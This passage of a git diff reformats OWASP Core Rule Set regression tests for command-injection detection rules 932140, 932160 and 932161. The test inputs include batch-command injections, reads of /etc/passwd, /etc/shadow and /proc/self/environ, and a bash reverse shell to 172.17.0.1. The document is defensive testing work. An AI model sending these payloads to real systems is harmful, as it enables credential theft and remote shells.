log_contains: id "932140" + - test_id: 141 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+%251+%3D%3D+%22%22+%28" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 142 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+%22%251%22+%3D%3D+%22%22+%28" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 143 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+%7B%251%7D+%3D%3D+%7B%7D" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 144 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+%22A%251%22+%3D%3D+%22A%22+%28" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 145 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=IF+DEFINED+ARG+%28echo+%22It+is+defined%3A+%251%22%29+ELSE+%28echo+%22%25%251+is+not+defined%22%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 146 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if3q+hfy6e8egfxsjtewc838gsfbhwvw9qzfty3gjs86syg7y6mrpwgw4ekureakjpk6%2Flyghe9pnfekpw2yt8svzseinhs1rbkuu%2Fzq15u5wh8nj8dd+fn86qcdwzv3s9hw35e14pxgcv34dhmt1mwbxnicwudjawfqz+fphmr5vlnufdihoffpuvqwkcmom61i3lisyxg65fx+rgbnrs6e4pmbvy2xl+vwb8oct23cyypregi638dkychllvvw5kq7rolfbhk3hojxz9tthunqky9dodqbb6u8roh+firwx8kuf1dfgewcto9eljhuaoqgdk4qwxlziktaf1mw2atcmw7jvzsh1s0kngiepps54lj4wtcbfzfvbqb7y3caffhnvfrm3tbjxlywqakfqxoprh7yooguat5flg2ozx5%2Fafn7w%3D%3D" + version: HTTP/1.0 + output: + no_log_contains: id "932140" + - test_id: 147 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 148 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if%2Fi+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 149 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" 
+ method: GET + port: 80 + uri: "/get?foo=if+%2Fi+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 150 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%2Fi+%22a%22%3D%3D%22b%22++foo" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 151 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%2Fi+not++%22a%22%3D%3D%22b%22++foo" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 152 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+++exist+StorageServer.port+echo+yay" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 153 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%2Fi+exist+StorageServer.port+echo+yay" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 154 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET 
+ port: 80 + uri: "/get?foo=ifq+a%3D%3Db+foo" + version: HTTP/1.0 + output: + no_log_contains: id "932140" + - test_id: 155 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=iffoo+a%3D%3Db+foo" + version: HTTP/1.0 + output: + no_log_contains: id "932140" + - test_id: 156 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if3+a%3D%3Db+foo" + version: HTTP/1.0 + output: + no_log_contains: id "932140" + - test_id: 157 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if3q+a%3D%3Db+foo" + version: HTTP/1.0 + output: + no_log_contains: id "932140" + - test_id: 158 desc: | FP when using `t:urlDecodeUni`. Using `t:urlDecodeUni` removes the `+` from the encoded value in the XML document, which produced a false positive match. 
See https://github.com/coreruleset/coreruleset/issues/1785 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: if+foo== - output: - no_log_contains: id "932140" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: if+foo== + output: + no_log_contains: id "932140" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml index 300ea3657..993e9b989 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml 
@@ -1,236 +1,221 @@ --- meta: author: "Paul Beckett, Esad Cetiner, azurit" - enabled: true - name: "932160.yaml" description: "Tests to trigger or not trigger rule 932160" +rule_id: 932160 tests: - - test_title: 932160-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932160-1=cat%20/etc/passwd" - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932160-1=cat%20/etc/passwd" + version: "HTTP/1.1" + output: + log_contains: "id \"932160\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "932160-2=/usr/bin/perl -e 'print readline' some-file.txt" - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-3 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "932160-2=/usr/bin/perl -e 'print readline' some-file.txt" + version: "HTTP/1.1" + output: + log_contains: "id \"932160\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Cookie: 
"931120-3=/usr/bin/python3 -m http.server" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: "931120-3=/usr/bin/python3 -m http.server" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932160\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: '932160-2=dont match commands that are not fully qualified like bash python and perl.' - version: "HTTP/1.1" - output: - no_log_contains: "id \"932160\"" - - test_title: 932160-5 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: '932160-2=dont match commands that are not fully qualified like bash python and perl.' 
+ version: "HTTP/1.1" + output: + no_log_contains: "id \"932160\"" + - test_id: 5 desc: "Positive test: Match against bin/gunzip" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: 'cmd=/bin/gunzip -c /var/log/something_sensitive.gz' - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-6 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: 'cmd=/bin/gunzip -c /var/log/something_sensitive.gz' + version: "HTTP/1.1" + output: + log_contains: "id \"932160\"" + - test_id: 6 desc: "Positive test: Match against bin/unxz" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: 'cmd=/bin/unxz -c /var/log/something_sensitive.xz' - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-7 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: 'cmd=/bin/unxz -c /var/log/something_sensitive.xz' + version: "HTTP/1.1" + output: + log_contains: "id \"932160\"" + - test_id: 7 desc: "Negative test: Don't match against the word zip" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" 
- Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: 'sentence=The zip on my coat is stuck' - version: "HTTP/1.1" - output: - no_log_contains: "id \"932160\"" - - test_title: 932160-8 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: 'sentence=The zip on my coat is stuck' + version: "HTTP/1.1" + output: + no_log_contains: "id \"932160\"" + - test_id: 8 desc: "Positive test: Triggering only this rule and no other one" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - uri: "/post" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'cmd=/bin/ab' - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-9 + - input: + dest_addr: "127.0.0.1" + method: "POST" + uri: "/post" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'cmd=/bin/ab' + version: "HTTP/1.1" + output: + log_contains: "id \"932160\"" + - test_id: 9 desc: "Positive test: Unix Command Injection - $SHELL test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # code=$SHELL -c "echo hi" - uri: "/get?code=%24SHELL%20-c%20%22echo%20hi%22" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-10 + - input: + dest_addr: 127.0.0.1 + 
headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # code=$SHELL -c "echo hi" + uri: "/get?code=%24SHELL%20-c%20%22echo%20hi%22" + version: HTTP/1.0 + output: + log_contains: id "932160" + - test_id: 10 desc: "Positive test: Unix Command Injection - ${SHELL} test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # code=${SHELL} -c "echo hi" - uri: "/get?code=%24%7BSHELL%7D%20-c%20%22echo%20hi%22" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # code=${SHELL} -c "echo hi" + uri: "/get?code=%24%7BSHELL%7D%20-c%20%22echo%20hi%22" + version: HTTP/1.0 + output: + log_contains: id "932160" + - test_id: 11 desc: "Positive test: Match against bin/ansible" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?a=bin/ansible" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?a=bin/ansible" + version: HTTP/1.0 + output: + log_contains: id "932160" + - 
test_id: 12 desc: "Positive test: Match against bin/chef" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?a=bin/chef" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?a=bin/chef" + version: HTTP/1.0 + output: + log_contains: id "932160" + - test_id: 13 desc: "Positive test: Match against bin/cscli" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?a=bin/cscli" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?a=bin/cscli" + version: HTTP/1.0 + output: + log_contains: id "932160" + - test_id: 14 desc: "Positive test: Match against bin/visudo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?a=bin/visudo" - version: HTTP/1.0 - output: - log_contains: id "932160" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?a=bin/visudo" + version: HTTP/1.0 + output: + log_contains: id "932160" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml index 816c0c269..0667f10fb 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml 
@@ -1,192 +1,178 @@ --- meta: author: "Franziska Bühler, azurit" - enabled: true - name: "932161.yaml" tests: - - test_title: 932161-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: cat /etc/passwd - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: cat /etc/passwd + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: /etc/shadow - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: /etc/shadow + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: cat /proc/self/environ - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: cat /proc/self/environ + Host: "localhost" + 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9 - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9 + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 6 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: &/dev/tcp/172.17.0.1/54321 0>&1\'`; ?> - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: 
"/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-7 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: &/dev/tcp/172.17.0.1/54321 0>&1\'`; ?> + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 7 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: cat /etc/passwd - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-8 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: cat /etc/passwd + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 8 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: /etc/shadow - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-9 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: /etc/shadow + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: 
"GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: cat /proc/self/environ - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-10 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: cat /proc/self/environ + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 10 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9 - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-11 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9 + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 11 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-12 + - input: + dest_addr: "127.0.0.1" + 
